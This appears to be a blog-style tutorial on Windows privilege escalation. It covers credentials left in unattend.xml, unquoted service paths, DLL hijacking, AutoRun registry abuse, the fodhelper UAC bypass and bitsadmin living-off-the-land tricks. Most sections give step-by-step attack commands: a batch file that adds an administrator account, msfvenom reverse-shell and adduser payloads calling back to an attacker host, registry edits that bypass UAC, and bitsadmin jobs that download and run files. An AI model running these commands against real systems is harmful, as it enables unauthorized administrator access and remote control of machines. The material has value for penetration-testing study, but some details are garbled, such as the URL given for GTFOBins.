Windows Privilege Escalation

Unattended Install Files

Organizations often need to install Windows on multiple machines simultaneously. Rather than manually setting up each system one by one, organizations use something called “unattended installs”” This is where files, like unattend.xml, are created to automate configuring the operating system without needing anyone to sit at the computer and click through all the setup options.

Where Do These Files Live?

The first place you'd want to look for these unattended install files is in the folder C:\Windows\Panther. Inside this folder, you might find a file called unattend.xml. This file is like a set of instructions that tells Windows how to install itself and what configurations to apply. But, here's the key part: sometimes this file can contain sensitive information, such as local administrator or even domain credentials!

If these credentials are still present in the file after the setup process is complete, it becomes a goldmine for anyone looking to escalate privileges. Finding credentials in this file could give you administrative access to the local machine or even other systems within the network. The idea here is simple: if you gain access to a machine, and the file hasn't been properly cleaned up, you could extract those credentials and use them to your advantage.

/<component name="Microsoft-Windows-Shell-Setup" processorArchitecture="x86" publicKeyToken="31bf3856ad364e35" versionScope="nonSxS">
  <UserAccounts>
    <AdministratorPassword>
      <Value>encrypted_password_string</Value>
    </AdministratorPassword>
  </UserAccounts>
</component>

This is a great sign! The presence of administrator credentials in this file gives you an opportunity to retrieve and possibly decrypt them, granting you administrator access.

Unquoted Paths with Spaces

When Windows starts a program, it needs to know the exact path to the program's executable file. Normally, administrators should enclose this path in quotation marks, especially if it includes spaces. This tells Windows that everything within the quotes is a single path.

For example, a program with the following path should look like this:

"C:\Program Files\My Application\myapp.exe”

If, however, the path is unquoted, Windows might misinterpret where each folder and file begins and ends. This happens because Windows reads paths with spaces in sections, and an attacker could place their own executable in an earlier directory that Windows might run instead.

Let’s break it down further with an example.

Suppose there’s a service on a machine with this path:

C:\Program Files\My Application\myapp.exe

If this path is not quoted (appearing as C:\Program Files\My Application\myapp.exe), Windows might interpret it incorrectly. Here’s what could happen:

1. Windows Breaks the Path at Spaces: Without quotes, Windows might read the path in segments, such as:

   • C:\Program.exe

   • C:\Program Files\My.exe

   • C:\Program Files\My Application\myapp.exe

So how can we use this to gain higher access to the system

An attacker could place a malicious executable named Program.exe in the C:\ directory. Since Windows might read the path up to the first space (C:\Program), it would execute Program.exe instead of myapp.exe.

This is a classic example of exploiting unquoted service paths to trick Windows into running an unauthorized program.

An excellent way to find these services is to use this command in CMD

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

This command will search for the service name, executable path, display name of the service as well as the services which auto start in all the directories except C:\Windows\ and are already not enclosed within the double quotes.

So after we found the service, how can we use it to become root

Steps

Let's suppose we found a service called video stream with unquoted path.

. As the actual service executable is located in the C:\Program Files\VideoStream\1337 Log\ folder and there are no spaces around the full path, Windows will also attempt to execute C:\Program.exe or C:\Program Files\VideoStream\1337.exe .

So a great way of exploiting this is to make an executable called 1337.exe

Since this service is running with elevated permissions, we can write a batch script that creates a new user and then add that user to administrator's group

net user john Password123! /add
net localgroup administrators john /add

we can then save this file as 1337.bat and compile it to become an EXE file.

Following that we need to copy the 1337.exe we just created to the target path, to do that we can use this command.

Copy-Item -Path "Path\to\1337.exe" -Destination "C:\Program Files\VideoStream\1337.exe"

And finally, we have to restart the service so it can execute our file instead of the intended original file.

Restart-Service -Name 'Video Stream'

DLL Hijacking

Often, a service will try to load functionality from a library called a Dynamic Link Library (DLL).

Whatever functionality the DLL provides, will be executed with the SAME privileges as the service that loaded it. When a Windows program requires a DLL, it follows a specific search order to locate it. If the DLL isn’t found in the application’s directory, Windows continues searching through system directories in a particular order. This search pattern can become problematic when an application requests a DLL that doesn’t exist in its expected directory.

DLL Hijacking involves manipulating a trusted application into loading a malicious DLL. This term encompasses several tactics like DLL Spoofing, Injection, and Side-Loading. It's mainly utilized for code execution, achieving persistence, and, less commonly, privilege escalation. Despite the focus on escalation here, the method of hijacking remains consistent across objectives.

Common Techniques

1. DLL Replacement: Swapping a genuine DLL with a malicious one, optionally using DLL Proxying to preserve the original DLL's functionality.

2. DLL Search Order Hijacking: Placing the malicious DLL in a search path ahead of the legitimate one, exploiting the application's search pattern.

3. Phantom DLL Hijacking: Creating a malicious DLL for an application to load, thinking it's a non-existent required DLL.

Finding missing Dlls

The most common way to find missing Dlls inside a system is running procmon from sysinternals, setting the following 2 filters:

If you are looking for missing dlls in general you leave this running for some seconds. If you are looking for a missing dll inside an specific executable you should set another filter like "Process Name" "contains" "<exec name>", execute it, and stop capturing events.

Exploiting Missing DLLs

Requirements:

• Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.

• Ensure write access is available for any directory in which the DLL will be searched for. This location might be the directory of the executable or a directory within the system path.

Yeah, the requisites are complicated to find as by default it's kind of weird to find a privileged executable missing a DLL, and it's even more weird to have write permissions on a system path folder (you can't by default). But, in misconfigured environments, this is possible.

So let's suppose you found these requirements, now what ?

Using Meterpreter

Get a rev shell (x86)

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll

Create a user (x86)

msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll

Registry Exploits

AutoRuns

Windows can be configured to run commands at startup, with elevated privileges.

These "AutoRuns" are configured in the Registry.

If you are able to write to an AutoRun executable, and are able to restart the system, you may be able to escalate privileges.

Common AutoRun registry

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run

• HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

• HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

• HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run

• HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

• HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

• HKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnce

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx

Registry keys known as Run and RunOnce are designed to automatically execute programs every time a user logs into the system.

There are 2 ways to use this information to achieve privilege escalation

Exploit 1: If you can write inside any of the mentioned registry inside HKLM you can escalate privileges when a different user logs in

Exploit 2: If you can overwrite any of the binaries indicated on any of the registry inside HKLM you can modify that binary with a backdoor when a different user logs in and escalate privileges.

So how can we check if we can do this?

Enumeration

Manual Enumeration To perform manual enumeration and identify whether a Windows workstation is vulnerable to the RegistryAutoruns issue, you can use the following command from a command prompt:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Tool Enumeration

To run the SharpUp tool and perform an enumeration of the RegistryAutoruns vulnerability, you can execute the following command with appropriate arguments:

SharpUp.exe audit RegistryAutoruns

⚠️ Moreover, you can use SharpUp.exe audit to perform a comprehensive enumeration of all misconfigurations vulnerabilities on the specified machine.

Exploitation

1. Use msfvenom to generate a malicious executable (exe) file that can be executed via the booting of the victim's machine:

msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > shell.exe

1. Transfer the malicious executable file to victim's machine.

2. Move the malicious executable file to 'C:\Program Files\NickvourdSrv'.

3. Rename the 'NCV_AMD64.exe' to 'NCV_AMD64.bak'.

4. Rename the malicious exe (shell.exe) to 'NCV_AMD64.exe'.

1. Open a listener on your Kali machine.

2. Reboot the victim's machine and login as Adminstrator:

1. Verify the reverse shell on your Kali machine:

UAC Bypass

UAC, or User Account Control, is a security feature implemented in Microsoft Windows operating systems, starting with Windows Vista. Its primary purpose is to enhance the security of the operating system by prompting users for permission or confirmation before allowing certain actions that may require administrative privileges.

When an application or a user attempts to perform tasks that require elevated permissions, such as installing software, making system changes, or modifying certain system settings, UAC prompts the user with a dialog box asking for confirmation or prompting the entry of administrator credentials.

All protected objects in Windows are labeled with an integrity level. The default integrity level is medium, which is assigned to most users, system files, and registry keys on a system.

The following table illustrates the different levels of integrity:

Integrity Name	Details
Untrusted	Processes logged in anonymously are automatically categorized as Untrusted. For instance, consider Google Chrome
Low	The Low integrity level is the level used by default for interaction with the Internet. It's important to note that a process with a lower integrity level is restricted from writing to an object with a higher integrity level.
Medium	Processes initiated by standard users typically carry a medium integrity label, including those started by users within the administrators group.
High	Administrators are granted the High integrity level. Moreover, the root directory is safeguarded with a high-integrity label.
System	Most services are designated with System integrity.
Installer	The Installer integrity level is a unique case and represents the highest of all integrity levels.

The default configuration for UAC is Prompt for consent for non-Windows binaries, but can also have different configuration settings.

The following table illustrates various configuration settings of UAC in a system:

Prompt Name	Details
Prompt for consent for non-Windows binaries	This is the default. When an operation for a non-Microsoft application requires elevation of privilege, the user is prompted on the secure desktop to choose between Permit or Deny. If the user selects Permit, the operation continues with the user's highest available privilege.
Prompt for credentials:	An operation that requires elevation of privilege prompts the administrator to enter the username and password. If the administrator enters valid credentials, the operation proceeds with the appropriate privilege.
Prompt for consent:	An operation that requires elevation of privilege prompts the administrator to select Permit or Deny. If the administrator selects Permit, the operation continues with the administrator's highest available privilege.
Elevate without prompting	Assumes that the administrator will permit an operation that requires elevation, and additional consent or credentials are not required.

A UAC bypass refers a technique that allows a medium integrity process to elevate itself or spawn a new process in high integrity, without prompting the user for consent.

⚠️ In this section, I will present only one example of a UAC bypass, as there are numerous different UAC bypass techniques.

Enumeration

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

If it's 1 then UAC is activated, if its 0 or it doesn't exist, then UAC is inactive.

Then, check which level is configured:

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

• If 0 then, UAC won't prompt (like disabled)

• If 1 the admin is asked for username and password to execute the binary with high rights (on Secure Desktop)

• If 2 (Always notify me) UAC will always ask for confirmation to the administrator when he tries to execute something with high privileges (on Secure Desktop)

• If 3 like 1 but not necessary on Secure Desktop

• If 4 like 2 but not necessary on Secure Desktop

• if 5(default) it will ask the administrator to confirm to run non Windows binaries with high privileges

Then check for the value of LocalAccountTokenFilterPolicy.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy

• If it is set to 0, only the built-in Administrator account (RID 500) can perform administrative tasks without triggering User Account Control (UAC).

• If it is set to 1, all accounts in the "Administrators" group can perform administrative tasks without UAC prompts.

Finally, check the value of the FilterAdministratorToken key:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken

• If it’s set to 0 (default), the built-in Administrator account can perform remote administrative tasks.

• If it’s set to 1, the built-in Administrator cannot perform remote administrative tasks—unless LocalAccountTokenFilterPolicy is also set to 1.

All this information can be gathered using the metasploit module: post/windows/gather/win_privs

Exploitation

Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAC prompt appears

A UAC bypass is typically needed when UAC is active, your process is running in a medium integrity level, and your user is part of the Administrators group.

It's also important to note that bypassing UAC becomes significantly harder if it’s set to the highest security level (Always Notify), compared to any of the lower levels, like the default setting.

This case study leverages a UAC384 bypass that abuses the Fodhelper.exe application.

To abuse this scenario you should follow these steps:

1. Use msfvenom to generate a malicious executable (exe) file:

msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > nikos.exe

1. Transfer the malicious executable file to victim's machine.

2. Open a listener on your Kali machine.

3. Create with the following PowerShell command a new registry key:

New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force

1. Create a new registry entry named "DelegateExecute" under the specified registry path with an empty string as the value:

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force

1. Modify the default command which executed when the specified registry key is triggered:

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "powershell -exec bypass -c C:\<full_path>\<binary.exe>" -Force

1. Execute the fodhelper.exe:

C:\Windows\System32\fodhelper.exe

1. Verify the new reverse shell from your attacking machine with High Integrity:

UACME

UACME which is a compilation of several UAC bypass exploits. Note that you will need to compile UACME using visual studio or msbuild. The compilation will create several executables (like Source\Akagi\outout\x64\Debug\Akagi.exe) , you will need to know which one you need. You should be careful because some bypasses will prompt some other programs that will alert the user that something is happening.

Usage Example:

• Once you’ve chosen and compiled the right executable, transfer it to the target system.

• Run it with the appropriate privileges to initiate the UAC bypass. For example:

  Akagi.exe /Method 4

Metasploit also have some modules for UACBypass like exploit/windows/local/ask, exploit/windows/local/bypassuac, exploit/windows/local/bypassuac_injection

More Tools

• BeRoot: checks for common misconfigurations to find a way to escalate privileges
• Watson: .NET tool designed to enumerate missing KBs and suggest PrivEsc exploits
• PowerSploit's PowerUp:(part of Empire) is a pure PowerShell script that will use the techniques mentioned previously (and much more) to try to escalate privileges!

LOLBAS

Living Off The Land Binaries, Scripts and Libraries (LOLBAS) is the Windows equivalent of GTFOBins

GTFOBins can be found at https://lolbas-project.github.io/

Let's take a look at the bitsadmin executable and how it can be used by an attacker.

We can use bitsadmin to download a file:

bitsadmin Usage Examples

1. Downloading a File

plaintextCopy codebitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1

• Explanation: Here, we’re using bitsadmin to create a job to download a file from an external site. This command can be used by an attacker to pull malicious files or tools to a victim's machine.

• bitsadmin is an often-overlooked method because it’s a legitimate Windows tool, yet it allows remote file downloads without additional software.

2. Copying a File

plaintextCopy codebitsadmin /create 1 &
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\\playfolder\cmd.exe &
bitsadmin /RESUME 1 &
bitsadmin /Complete 1 &
bitsadmin /reset

• This command creates a job that copies an existing file (like cmd.exe) to another location, such as a temporary folder (playfolder).

• This method allows attackers to copy files for later execution without drawing much attention.

3. Executing a File

plaintextCopy codebitsadmin /create 1 &
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\playfolder\cmd.exe &
bitsadmin /SetNotifyCmdLine 1 c:\playfolder\cmd.exe NULL &
bitsadmin /RESUME 1 &
bitsadmin /Reset

• Explanation: Using SetNotifyCmdLine, this command sets up an action that executes cmd.exe after the job completes, which can be used for privilege escalation or persistence.

• Additional Note: This method leverages the notification feature of bitsadmin to trigger the execution automatically.

4. Executing a File in an Alternate Data Stream

plaintextCopy codebitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1

• Here, the file is placed into an alternate data stream (ADS), a technique used to hide payloads or maintain persistence.

• Attackers often use ADS for evading detection, as files in alternate streams aren’t as easily seen in regular file explorers.